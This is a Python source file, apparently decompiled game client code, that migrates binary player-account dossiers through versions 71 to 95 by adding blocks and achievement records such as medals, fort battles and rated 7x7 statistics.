companyDefaults = getStaticSizeBlockRecordValues(updateCtx, 'company', companyPacking)
addRecords(updateCtx, 'company', recordFormats, {'battlesCountBefore9_0': companyDefaults.get('battlesCount', 0)})
clanPacking = {'battlesCount': (4, 'I')}
clanDefaults = getStaticSizeBlockRecordValues(updateCtx, 'clan', clanPacking)
addRecords(updateCtx, 'clan', recordFormats, {'battlesCountBefore9_0': clanDefaults.get('battlesCount', 0)})
a7x7packing = {'battlesCount': (4, 'I')}
a7x7defaults = getStaticSizeBlockRecordValues(updateCtx, 'a7x7', a7x7packing)
addRecords(updateCtx, 'a7x7', recordFormats, {'battlesCountBefore9_0': a7x7defaults.get('battlesCount', 0)})
setVersion(updateCtx, 71)
return (
71, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier71(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
setVersion(updateCtx, 72)
return (
72, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier72(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'historical')
addBlock(updateCtx, 'maxHistorical')
addBlock(updateCtx, 'historicalAchievements')
addBlock(updateCtx, 'historicalCut')
setVersion(updateCtx, 73)
return (
73, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier73(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
formats = [
('godOfWar', 'H'),
('fightingReconnaissance', 'H'),
('fightingReconnaissanceMedal', 'H'),
('willToWinSpirit', 'H'),
('crucialShot', 'H'),
('crucialShotMedal', 'H'),
('forTacticalOperations', 'B')]
defaultValues = {'godOfWar': 0,
'fightingReconnaissance': 0,
'fightingReconnaissanceMedal': 0,
'willToWinSpirit': 0,
'crucialShot': 0,
'crucialShotMedal': 0,
'forTacticalOperations': 0
}
addRecords(updateCtx, 'achievements7x7', formats, defaultValues)
setVersion(updateCtx, 74)
return (
74, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier74(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
formats = [
('medalMonolith', 'H'),
('medalAntiSpgFire', 'H'),
('medalGore', 'H'),
('medalCoolBlood', 'H'),
('medalStark', 'H')]
addRecords(updateCtx, 'achievements', formats, {})
setVersion(updateCtx, 75)
return (
75, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier75(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'uniqueAchievements')
setVersion(updateCtx, 76)
return (
76, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier76(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut', 'uniqueAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'fortBattles')
addBlock(updateCtx, 'maxFortBattles')
addBlock(updateCtx, 'fortBattlesCut')
addBlock(updateCtx, 'fortSorties')
addBlock(updateCtx, 'maxFortSorties')
setVersion(updateCtx, 77)
return (
77, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier77(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut', 'uniqueAchievements',
'fortBattles', 'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'fortSortiesCut')
addBlock(updateCtx, 'fortBattlesInClan')
addBlock(updateCtx, 'maxFortBattlesInClan')
addBlock(updateCtx, 'fortSortiesInClan')
addBlock(updateCtx, 'maxFortSortiesInClan')
addBlock(updateCtx, 'fortMisc')
addBlock(updateCtx, 'fortMiscInClan')
addBlock(updateCtx, 'fortAchievements')
setVersion(updateCtx, 78)
return (
78, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier78(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut', 'uniqueAchievements',
'fortBattles', 'maxFortBattles', 'fortBattlesCut',
'fortSorties', 'maxFortSorties', 'fortSortiesCut',
'fortBattlesInClan', 'maxFortBattlesInClan',
'fortSortiesInClan', 'maxFortSortiesInClan',
'fortMisc', 'fortMiscInClan', 'fortAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
formats = [
('promisingFighter', 'H'),
('promisingFighterMedal', 'H'),
('heavyFire', 'H'),
('heavyFireMedal', 'H'),
('ranger', 'H'),
('rangerMedal', 'H'),
('fireAndSteel', 'H'),
('fireAndSteelMedal', 'H'),
('pyromaniac', 'H'),
('pyromaniacMedal', 'H'),
('noMansLand', 'H')]
defaultValues = {'promisingFighter': 0,
'promisingFighterMedal': 0,
'heavyFire': 0,
'heavyFireMedal': 0,
'ranger': 0,
'rangerMedal': 0,
'fireAndSteel': 0,
'fireAndSteelMedal': 0,
'pyromaniac': 0,
'pyromaniacMedal': 0,
'noMansLand': 0
}
addRecords(updateCtx, 'achievements7x7', formats, defaultValues)
setVersion(updateCtx, 79)
return (
79, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier79(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut', 'uniqueAchievements',
'fortBattles', 'maxFortBattles', 'fortBattlesCut',
'fortSorties', 'maxFortSorties', 'fortSortiesCut',
'fortBattlesInClan', 'maxFortBattlesInClan',
'fortSortiesInClan', 'maxFortSortiesInClan',
'fortMisc', 'fortMiscInClan', 'fortAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
formats = [
('WFC2014', 'B'),
('WFC2014WinSeries', 'B'),
('maxWFC2014WinSeries', 'B')]
addRecords(updateCtx, 'achievements', formats, {})
setVersion(updateCtx, 80)
return (
80, updateCtx['dossierCompDescr'])
def _count7x7awards(ctx):
packing = {'crucialShotMedal': (27, 'H'),
'noMansLand': (50, 'H'),
'fightingReconnaissanceMedal': (21, 'H'),'godOfWar': (17, 'H'),
'armoredFist': (14, 'H'),'fireAndSteelMedal': (44, 'H'),'forTacticalOperations': (29, 'B'),
'kingOfTheHill': (8, 'H'),'wolfAmongSheepMedal': (2, 'H'),'willToWinSpirit': (23, 'H'),
'heavyFireMedal': (36, 'H'),'maxTacticalBreakthroughSeries': (12, 'H'),'promisingFighterMedal': (32, 'H'),
'geniusForWarMedal': (6, 'H'),'rangerMedal': (40, 'H'),'pyromaniacMedal': (48, 'H')
}
awardNum = 0
values = getStaticSizeBlockRecordValues(ctx, 'achievements7x7', packing)
if values and values['maxTacticalBreakthroughSeries'] >= 3:
awardNum += 1
del values['maxTacticalBreakthroughSeries']
if values and values['forTacticalOperations'] > 0:
awardNum += 5 - values['forTacticalOperations']
del values['forTacticalOperations']
for val in values.itervalues():
awardNum += val
return awardNum
def __updateFromAccountDossier80(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut', 'uniqueAchievements',
'fortBattles', 'maxFortBattles', 'fortBattlesCut',
'fortSorties', 'maxFortSorties', 'fortSortiesCut',
'fortBattlesInClan', 'maxFortBattlesInClan',
'fortSortiesInClan', 'maxFortSortiesInClan',
'fortMisc', 'fortMiscInClan', 'fortAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
awardCount = _count7x7awards(updateCtx)
formats = [
('guerrilla', 'H'),
('guerrillaMedal', 'H'),
('infiltrator', 'H'),
('infiltratorMedal', 'H'),
('sentinel', 'H'),
('sentinelMedal', 'H'),
('prematureDetonation', 'H'),
('prematureDetonationMedal', 'H'),
('bruteForce', 'H'),
('bruteForceMedal', 'H'),
('awardCount', 'I'),
('battleTested', 'B')]
defaultValues = {'guerrilla': 0,
'guerrillaMedal': 0,
'infiltrator': 0,
'infiltratorMedal': 0,
'sentinel': 0,
'sentinelMedal': 0,
'prematureDetonation': 0,
'prematureDetonationMedal': 0,
'bruteForce': 0,
'bruteForceMedal': 0,
'awardCount': awardCount,
'battleTested': 0
}
addRecords(updateCtx, 'achievements7x7', formats, defaultValues)
setVersion(updateCtx, 81)
return (
81, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier81(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut', 'uniqueAchievements',
'fortBattles', 'maxFortBattles', 'fortBattlesCut',
'fortSorties', 'maxFortSorties', 'fortSortiesCut',
'fortBattlesInClan', 'maxFortBattlesInClan',
'fortSortiesInClan', 'maxFortSortiesInClan',
'fortMisc', 'fortMiscInClan', 'fortAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
layout = [
'titleSniper',
'invincible',
'diehard',
'handOfDeath',
'armorPiercer',
'battleCitizen',
'WFC2014',
'tacticalBreakthrough']
values = {}
achievementsPacking = {'titleSniper': (88, 'B'),
'invincible': (89, 'B'),
'diehard': (90, 'B'),
'handOfDeath': (93, 'B'),
'armorPiercer': (94, 'B'),
'battleCitizen': (131, 'B'),
'WFC2014': (142, 'B')
}
values.update(getStaticSizeBlockRecordValues(updateCtx, 'achievements', achievementsPacking))
achievements7x7Packing = {'tacticalBreakthrough': (16, 'B')
}
values.update(getStaticSizeBlockRecordValues(updateCtx, 'achievements7x7', achievements7x7Packing))
blockFormat, blockValues = getNewBinarySetBlockValues(layout, values)
addBlock(updateCtx, 'singleAchievements', blockFormat, blockValues)
removeRecords(updateCtx, 'achievements', achievementsPacking)
removeRecords(updateCtx, 'achievements7x7', achievements7x7Packing)
setVersion(updateCtx, 82)
return (
82, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier82(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut', 'uniqueAchievements',
'fortBattles', 'maxFortBattles', 'fortBattlesCut',
'fortSorties', 'maxFortSorties', 'fortSortiesCut',
'fortBattlesInClan', 'maxFortBattlesInClan',
'fortSortiesInClan', 'maxFortSortiesInClan',
'fortMisc', 'fortMiscInClan', 'fortAchievements', 'singleAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
blockLayout = [
('medalRotmistrov', 'B')]
blockFormat, blockValues = getNewStaticSizeBlockValues(blockLayout, {'medalRotmistrov': 0})
addBlock(updateCtx, 'clanAchievements', blockFormat, blockValues)
setVersion(updateCtx, 83)
return (
83, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier83(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'a15x15Cut',
'rareAchievements',
'total',
'a7x7Cut',
'max15x15',
'max7x7',
'achievements7x7',
'historical',
'maxHistorical',
'historicalAchievements',
'historicalCut',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortBattlesCut',
'fortSorties',
'maxFortSorties',
'fortSortiesCut',
'fortBattlesInClan',
'maxFortBattlesInClan',
'fortSortiesInClan',
'maxFortSortiesInClan',
'fortMisc',
'fortMiscInClan',
'fortAchievements',
'singleAchievements',
'clanAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
a15x15packing = {'battlesCountBefore9_0': (68, 'I'),'battlesCountBefore8_8': (56, 'I')}
values = getStaticSizeBlockRecordValues(updateCtx, 'a15x15', a15x15packing)
if values and values['battlesCountBefore8_8'] > 0 and values['battlesCountBefore9_0'] == 0:
values['battlesCountBefore9_0'] = values['battlesCountBefore8_8']
setStaticSizeBlockRecordValues(updateCtx, 'a15x15', a15x15packing, values)
clanPacking = {'battlesCountBefore9_0': (60, 'I'),'battlesCountBefore8_9': (56, 'I')}
values = getStaticSizeBlockRecordValues(updateCtx, 'clan', clanPacking)
if values and values['battlesCountBefore8_9'] > 0 and values['battlesCountBefore9_0'] == 0:
values['battlesCountBefore9_0'] = values['battlesCountBefore8_9']
setStaticSizeBlockRecordValues(updateCtx, 'clan', clanPacking, values)
companyPacking = {'battlesCountBefore9_0': (60, 'I'),'battlesCountBefore8_9': (56, 'I')}
values = getStaticSizeBlockRecordValues(updateCtx, 'company', companyPacking)
if values and values['battlesCountBefore8_9'] > 0 and values['battlesCountBefore9_0'] == 0:
values['battlesCountBefore9_0'] = values['battlesCountBefore8_9']
setStaticSizeBlockRecordValues(updateCtx, 'company', companyPacking, values)
setVersion(updateCtx, 84)
return (
84, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier84(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'a15x15Cut',
'rareAchievements',
'total',
'a7x7Cut',
'max15x15',
'max7x7',
'achievements7x7',
'historical',
'maxHistorical',
'historicalAchievements',
'historicalCut',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortBattlesCut',
'fortSorties',
'maxFortSorties',
'fortSortiesCut',
'fortBattlesInClan',
'maxFortBattlesInClan',
'fortSortiesInClan',
'maxFortSortiesInClan',
'fortMisc',
'fortMiscInClan',
'fortAchievements',
'singleAchievements',
'clanAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
recordFormats = [
('impenetrable', 'H'),
('reliableComradeSeries', 'H'),
('reliableComrade', 'H'),
('maxAimerSeries', 'B'),
('shootToKill', 'H'),
('fighter', 'H'),
('duelist', 'H'),
('demolition', 'H'),
('arsonist', 'H'),
('bonecrusher', 'H'),
('charmed', 'H'),
('even', 'H')]
addRecords(updateCtx, 'achievements', recordFormats, {})
setVersion(updateCtx, 85)
return (
85, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier85(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'a15x15Cut',
'rareAchievements',
'total',
'a7x7Cut',
'max15x15',
'max7x7',
'achievements7x7',
'historical',
'maxHistorical',
'historicalAchievements',
'historicalCut',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortBattlesCut',
'fortSorties',
'maxFortSorties',
'fortSortiesCut',
'fortBattlesInClan',
'maxFortBattlesInClan',
'fortSortiesInClan',
'maxFortSortiesInClan',
'fortMisc',
'fortMiscInClan',
'fortAchievements',
'singleAchievements',
'clanAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
formats = [
('wins', 'H'),
('capturedBasesInAttack', 'H'),
('capturedBasesInDefence', 'H')]
addRecords(updateCtx, 'fortAchievements', formats, {})
setVersion(updateCtx, 86)
return (
86, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier86(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'a15x15Cut',
'rareAchievements',
'total',
'a7x7Cut',
'max15x15',
'max7x7',
'achievements7x7',
'historical',
'maxHistorical',
'historicalAchievements',
'historicalCut',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortBattlesCut',
'fortSorties',
'maxFortSorties',
'fortSortiesCut',
'fortBattlesInClan',
'maxFortBattlesInClan',
'fortSortiesInClan',
'maxFortSortiesInClan',
'fortMisc',
'fortMiscInClan',
'fortAchievements',
'singleAchievements',
'clanAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
formats = [
('deathTrackWinSeries', 'B'),
('maxDeathTrackWinSeries', 'B')]
addRecords(updateCtx, 'achievements', formats, {})
setVersion(updateCtx, 87)
return (
87, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier87(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'a15x15Cut',
'rareAchievements',
'total',
'a7x7Cut',
'max15x15',
'max7x7',
'achievements7x7',
'historical',
'maxHistorical',
'historicalAchievements',
'historicalCut',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortBattlesCut',
'fortSorties',
'maxFortSorties',
'fortSortiesCut',
'fortBattlesInClan',
'maxFortBattlesInClan',
'fortSortiesInClan',
'maxFortSortiesInClan',
'fortMisc',
'fortMiscInClan',
'fortAchievements',
'singleAchievements',
'clanAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
formats = [
('readyForBattleLT', 'B'),
('readyForBattleMT', 'B'),
('readyForBattleHT', 'B'),
('readyForBattleSPG', 'B'),
('readyForBattleATSPG', 'B'),
('readyForBattleALL', 'B'),
('tankwomenProgress', 'B')]
addRecords(updateCtx, 'achievements', formats, {})
setVersion(updateCtx, 88)
return (
88, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier88(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'a15x15Cut',
'rareAchievements',
'total',
'a7x7Cut',
'max15x15',
'max7x7',
'achievements7x7',
'historical',
'maxHistorical',
'historicalAchievements',
'historicalCut',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortBattlesCut',
'fortSorties',
'maxFortSorties',
'fortSortiesCut',
'fortBattlesInClan',
'maxFortBattlesInClan',
'fortSortiesInClan',
'maxFortSortiesInClan',
'fortMisc',
'fortMiscInClan',
'fortAchievements',
'singleAchievements',
'clanAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'rated7x7')
addBlock(updateCtx, 'maxRated7x7')
setVersion(updateCtx, 89)
return (
89, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier89(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'a15x15Cut',
'rareAchievements',
'total',
'a7x7Cut',
'max15x15',
'max7x7',
'achievements7x7',
'historical',
'maxHistorical',
'historicalAchievements',
'historicalCut',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortBattlesCut',
'fortSorties',
'maxFortSorties',
'fortSortiesCut',
'fortBattlesInClan',
'maxFortBattlesInClan',
'fortSortiesInClan',
'maxFortSortiesInClan',
'fortMisc',
'fortMiscInClan',
'fortAchievements',
'singleAchievements',
'clanAchievements',
'rated7x7',
'maxRated7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'achievementsRated7x7')
setVersion(updateCtx, 90)
return (
90, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier90(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'a15x15Cut',
'rareAchievements',
'total',
'a7x7Cut',
'max15x15',
'max7x7',
'achievements7x7',
'historical',
'maxHistorical',
'historicalAchievements',
'historicalCut',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortBattlesCut',
'fortSorties',
'maxFortSorties',
'fortSortiesCut',
'fortBattlesInClan',
'maxFortBattlesInClan',
'fortSortiesInClan',
'maxFortSortiesInClan',
'fortMisc',
'fortMiscInClan',
'fortAchievements',
'singleAchievements',
'clanAchievements',
'rated7x7',
'maxRated7x7',
'achievementsRated7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'rated7x7Cut')
setVersion(updateCtx, 91)
return (
91, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier91(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut',
'fortBattlesInClan', 'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan',
'fortMisc', 'fortMiscInClan', 'fortAchievements', 'singleAchievements', 'clanAchievements',
'rated7x7', 'maxRated7x7', 'achievementsRated7x7', 'rated7x7Cut']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addRecords(updateCtx, 'achievements', [('testartilleryman', 'H')], {})
setVersion(updateCtx, 92)
return (
92, updateCtx['dossierCompDescr'])
def _countBattleHeroesBasedOn7x7Medals(ctx):
packing = {'wolfAmongSheepMedal': (2, 'H'),'geniusForWarMedal': (6, 'H')}
awardNum = 0
values = getStaticSizeBlockRecordValues(ctx, 'achievements7x7', packing)
for val in values.itervalues():
awardNum += val
return awardNum
def _medalKayClass(battleHeroes):
medalKayCfg = (1, 10, 100, 1000)
maxMedalClass = len(medalKayCfg)
for medalClass in xrange(1, maxMedalClass + 1):
if battleHeroes >= medalKayCfg[maxMedalClass - medalClass]:
break
else:
medalClass = 0
return medalClass
def __updateFromAccountDossier92(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut',
'fortBattlesInClan', 'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan',
'fortMisc', 'fortMiscInClan', 'fortAchievements', 'singleAchievements', 'clanAchievements',
'rated7x7', 'maxRated7x7', 'achievementsRated7x7', 'rated7x7Cut']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
battleHeroes7x7Count = _countBattleHeroesBasedOn7x7Medals(updateCtx)
if battleHeroes7x7Count > 0:
achievementsPacking = {'battleHeroes': (20, 'H'),'medalKay': (38, 'B')}
values = getStaticSizeBlockRecordValues(updateCtx, 'achievements', achievementsPacking)
if values:
values['battleHeroes'] += battleHeroes7x7Count
values['medalKay'] = _medalKayClass(values['battleHeroes'])
setStaticSizeBlockRecordValues(updateCtx, 'achievements', achievementsPacking, values)
setVersion(updateCtx, 93)
return (
93, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier93(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut',
'fortBattlesInClan', 'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan',
'fortMisc', 'fortMiscInClan', 'fortAchievements', 'singleAchievements', 'clanAchievements',
'rated7x7', 'maxRated7x7', 'achievementsRated7x7', 'rated7x7Cut']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'globalMapCommon')
addBlock(updateCtx, 'globalMapMiddle')
addBlock(updateCtx, 'globalMapChampion')
addBlock(updateCtx, 'globalMapAbsolute')
setVersion(updateCtx, 94)
return (
94, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier94(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7', 'historical', 'maxHistorical',
'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut',
'fortBattlesInClan', 'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan',
'fortMisc', 'fortMiscInClan', 'fortAchievements', 'singleAchievements', 'clanAchievements',
'rated7x7', 'maxRated7x7', 'achievementsRated7x7', 'rated7x7Cut',
'globalMapCommon', 'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
removeBlock(updateCtx, 'globalMapCommon')
recordFormats = [
('xpBefore8_9', 'I'),
('battlesCountBefore8_9', 'I'),
('battlesCountBefore9_0', 'I')]
addRecords(updateCtx, 'globalMapMiddle', recordFormats, {})
addRecords(updateCtx, 'globalMapChampion', recordFormats, {})
addRecords(updateCtx, 'globalMapAbsolute', recordFormats, {})
setVersion(updateCtx, 95)
return (
95, updateCtx['dossierCompDescr'])
